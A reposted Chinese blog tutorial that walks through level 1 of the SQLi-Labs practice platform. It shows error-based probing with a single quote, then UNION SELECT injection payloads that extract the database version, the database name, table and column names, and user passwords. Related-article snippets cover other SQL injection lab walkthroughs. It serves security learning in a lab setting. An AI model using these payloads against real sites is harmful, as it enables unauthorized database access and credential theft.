SQLi-Labs SQL注入练习平台(第一关)

最新推荐文章于 2024-04-11 22:32:24 发布
最新推荐文章于 2024-04-11 22:32:24 发布
阅读量345 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/GFAlisa/p/8310864.html
版权

        所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。-----百度百科

  我用的是看雪论坛提供的平台:http://43.247.91.228:84/

  一般来说习惯先加一个单引号(英文),来判断

  其中%27为单引号通过url编码而来,其他的编码可以参考百度百科的  https://baike.baidu.com/item/URL%E7%BC%96%E7%A0%81/3703727?fr=aladdin,由上图可知加单引号报错错误

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

  将单引号分开些,貌似可以更好的理解

 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '   '   1'   ' LIMIT 0,1' at line 1

  发现单引号并没有匹配,由此可知sql语句为:

select * from users where id='$id'

  所以我们使用: and '1'='1 进行匹配:

  返回正常

  构造语句 

id=-1 ' union select 1,2,3 --+

 

id=-1 ' union select 1,version(),3 --+

  数据库版本

  查看数据库

id=-1 ' union select 1,database(),3 --+

  查看表

-1 'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

查看users表

union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273

  发现users表中有 id username password 三个字段,查看password 

-1'union select 1,password,3 from users--+

  个人理解,可能存在错误。

转载于:https://www.cnblogs.com/GFAlisa/p/8310864.html

banyang6297
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第一关的闯关
qq_45154529的博客
01-05 2058
第一关:单引号错误 SQL的注入最终是为了拿到数据库的文件或者数据。 刚进页面,显示需要输入id。 于是我们使用在地址栏后面加上 ?id=1 第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。 如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句 echo “$sql” 判断有无注入点: 老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
Pikachu漏洞练习平台SQL注入
ranuy阮的博客
02-27 1959
0x00 Pikachu Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 项目地址:https://github.com/zhuifengshaonianhanlu/pikachu 0x01 数字型注入(post) 界面如下 使用burpsuite抓包 POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1 Host: 127.0...
SQL注入练习平台sqli-labs
海枫的专栏
11-04 1万+
你是否在学习SQL注入找不到好的OJ平台,这里介绍sqli-labs项目给你,非常适合SQL注入初学者来这里升级怪兽。
sqli-labs通关详解(1-20关)
最新发布
2302_81105681的博客
04-11 2821
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sql注入漏洞学习--pikachu 2023/03/24-25
m0_53689197的博客
03-25 195
sql注入漏洞学习--pikachu 2023/03/24-25
sqlilabs第一关懵逼小解答
zlloveyouforever的博客
03-13 4880
sqlilabs第一关新手大解惑,小白看过来,大佬不要来。绝对很详细哦,骗你是修勾。
SQL注入测试平台 SQLol -2.SELECT注入测试
Galaxy_0的博客
01-13 224
SQL注入测试平台 SQLol -2.SELECT注入测试
sqli-labs第一关详解 纯新手向 含原理
髣髴兮若轻云之蔽月
04-23 2304
Less-01 为方便初学者理解,更改了sqli-labs的源码,以显示sql语句 后期学习中需要自己推理 初始页面 在url后面用get传值id=1,随后能看到网页出现变化 如下图 不断更改上传id的值,会有不同的用户信息显示。 按递增顺序直到14为止, 即(1~14) 判断注入点是否存在且能否使用 一般使用单引号进行判断,加到url后面 出现报错 内容大致为LIMIT0,1附近有语法错误。 为什么要使用单引号进行判断 实际上,我们可以看到sql语句为 SELECT * FROM users
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
渗透漏洞基础之sqli-labs第一关
lbg685的博客
02-20 518
渗透漏洞超级基础之sqli-labs第一关
SQL注入Sqli-labs注入环境搭建
u011417723的博客
03-04 1172
SQL注入Sqli-labs注入环境搭建
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs靶场1-5关
2302_80044238的博客
01-27 1142
输入:(解析:updatexml()是一个用于修改XML数据的SQL函数 1 是XML中的路径,concat()用于将0x7e和selectdatabase()函数拼接起来,0x7e是十六进制表示~特殊符号会导致查询出错从而爆出数据 (0x7e也可使用其他符号代替但是需要加上单引号))当我们尝试不闭合还有单引号闭合两种方法时发现页面反馈给我们的时sql语法不正确也就是我们所注入的sql攻击语句是无法执行的,此时我们可以去看看此网页的源代码(可以直接在小皮的根目录里面找对应的关卡就可以找到)
sqli-labs 第一关
weixin_48800344的博客
08-31 769
sql注入大体解释 通过构造闭合语句来执行想要执行的命令 第一关 推荐工具 HackBar 为什么不用url输入,做着做着就不知道代码那里出错了,用hackber方便简洁,其实url输入也行 第一步:判断什么型的注入 1.判断是什么型注入就要看给他错误语句是否报错 例如:判断什么型注入直接看1’ and 1=2# 1 and 1=2#那个会报错 详细因为当运行可执行指令中假如程序有错误语句会报错,如果可执行程序中有错误语句但没报错就可以看出来了 我是这么理解的,希望有更好的解释 [外链图片转存失败
RHEL-7搭建SQLi-Labs(Apache+MySQL+PHP).docx
06-15
SQLi-Labs是一个专业的SQL注入练习平台,可用于GET和POST场景,其中包括多种类型的注入漏洞。 首先,SQLi-Labs提供了基于错误的注入(Union Select)和基于误差的注入(双查询注入)等注入漏洞练习。这些练习旨在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值